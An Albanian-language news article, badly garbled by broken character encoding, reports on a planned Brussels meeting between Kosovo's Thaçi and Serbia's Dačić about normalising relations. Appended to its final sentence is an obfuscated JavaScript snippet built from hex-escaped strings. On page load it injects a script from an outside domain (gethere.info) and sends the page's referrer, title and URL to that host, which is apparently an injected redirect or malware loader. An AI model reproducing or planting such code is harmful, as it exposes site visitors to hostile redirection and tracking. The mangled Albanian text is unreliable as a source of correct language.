largea_dacic-thaqi1352274103

IBM, nA� tryezA�n e bisedimeve

Kryeministri i KosovA�s, Hashim ThaA�i dhe ai serb, Ivica Dacic, pritet tA� takohen sot sA�rish nA� Bruksel me ftesA� tA� BaroneshA�s Catherine Ashton.

Ende pa u ulur nA� tryezA�n e bisedimeve, pA�r herA� tA� dytA� brenda pak javA�sh, tA� dy kryeministrat kanA� lA�nA� pA�r tA� kuptuar se pikA�pamjet e tyre rreth mA�nyrA�s sA� normalizimit tA� marrA�dhA�nieve nuk pA�rputhen.

Kryeministri ThaA�i ka A�uar porosinA� nga Zagrebi tA� mA�rkurA�n se nuk do tA� diskutojA� me Dacic rreth statusit tA� KosovA�s.

a�?Statusi i KosovA�s A�shtA� zgjidhur pA�rgjithmonA� me shpalljen e pavarA�sisA�a�?, A�shtA� shprehur ThaA�i.

Duke folur ndA�rkaq pA�r temat e takimit, kreu i QeverisA� ka thA�nA� se nA� rend tA� parA� A�shtA� zbatimi i marrA�veshjeve paraprake tA� arritura nA� Bruksel.

TemA� tjetA�r, sipas tij, duhet tA� zgjidhet nA� mA�nyrA� urgjente A�shtA� fati i tA� pagjeturve.

Kryeministri serb, Ivica Dacic, ka thA�nA� se e ka idenA� e vet tA� zgjidhjes sA� problemit, por ka mohuar njohjen e pavarA�sisA�.

a�?ThaA�i mund tA� deklarojA� A�ka tA� dA�shirojA�a�?, ka deklaruar Dacic.

Rreth takimit ka folur edhe Ministri i JashtA�m i KosovA�s, Enver Hoxhaj.

a�?Agjenda kohore dhe pA�rmbajtjesore e temave qA� do tA� diskutohen A�shtA� prezantuar edhe nA� takimin e parA�, duke filluar pra nga largimi i strukturave paralele e deri te mA�nyra e anA�tarA�simit tA� KosovA�s nA� organizatat ndA�rkombA�tare pa bllokim nga Serbia, pA�r kA�to tema nA� mA�nyrA� tA� detajuar ka folur edhe Kryeministri gjatA� raportimit tA� tij nA� Kuvendin e KosovA�sa�?, ka thA�nA� Hoxhaj.

Burime tA� ditores a�?Expressa�? kanA� bA�rA� tA� ditur se ndA�r marrA�veshjet tA� cilat do ta��i hapA� si temA� kreu i qeverisA� kosovare do tA� jetA� ajo e menaxhimit tA� integruar tA� kufijve e njohur si IBM.

a�?Do tA� diskutohet se si tA� arrihet zbatimi i saj nA� praktikA�a�?.

Por, ky burim ka bA�rA� tA� ditur se edhe Baronesha Ashton pritet tA� dalA� me listA�n temave qA� pritet ta��i diskutojnA� Prishtina dhe Beogradi.

E njA� temA� tjetA�r qA� ditA�ve tA� fundit A�shtA� pA�rfolur nA� opinion, e ka nxitur reagime tA� kundA�rta tA� palA�ve nA� dialog, A�shtA� ajo pA�r hapjen e zyrave ndA�rlidhA�se nA� kryeqytetet e shteteve pA�rkatA�se.

Prishtina zyrtare tashmA� A�shtA� deklaruar e gatshme pA�r tA� marrA� njA� hap drejt implementimi tA� kA�saj ideje.MirA�po, kundA�r saj ka dalA� Beogradi. Ivica Dacic ditA� mA� parA� tha se nA� vend tA� zyrave do tA� diskutohet tA� dA�rgohen zyrtarA� ndA�rlidhA�s e tA� cilA�t do tA� mund tA� monitoronin implementimin e marrA�veshjeve tA� arritura mes PrishtinA�s dhe Beogradit.

Ndryshe rreth takimit tA� dytA� ThaA�i-Dacic ka pasur edhe reagime tA� ndryshme nga spektri politik nA� vend. PartitA� opozitare sA�rish janA� shfaqur nA� dysh sa i pA�rket kA�tij takimit. AAK-ja vazhdon tA� pA�rkrah dialogun dhe takimet mes krerA�ve shtetA�ror, ndA�rsa LDK-ja A�shtA� shfaqur me rezerva, por nuk e ka kundA�rshtuar atA� pA�r dallim prej LA�vizjes VetA�vendosje.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}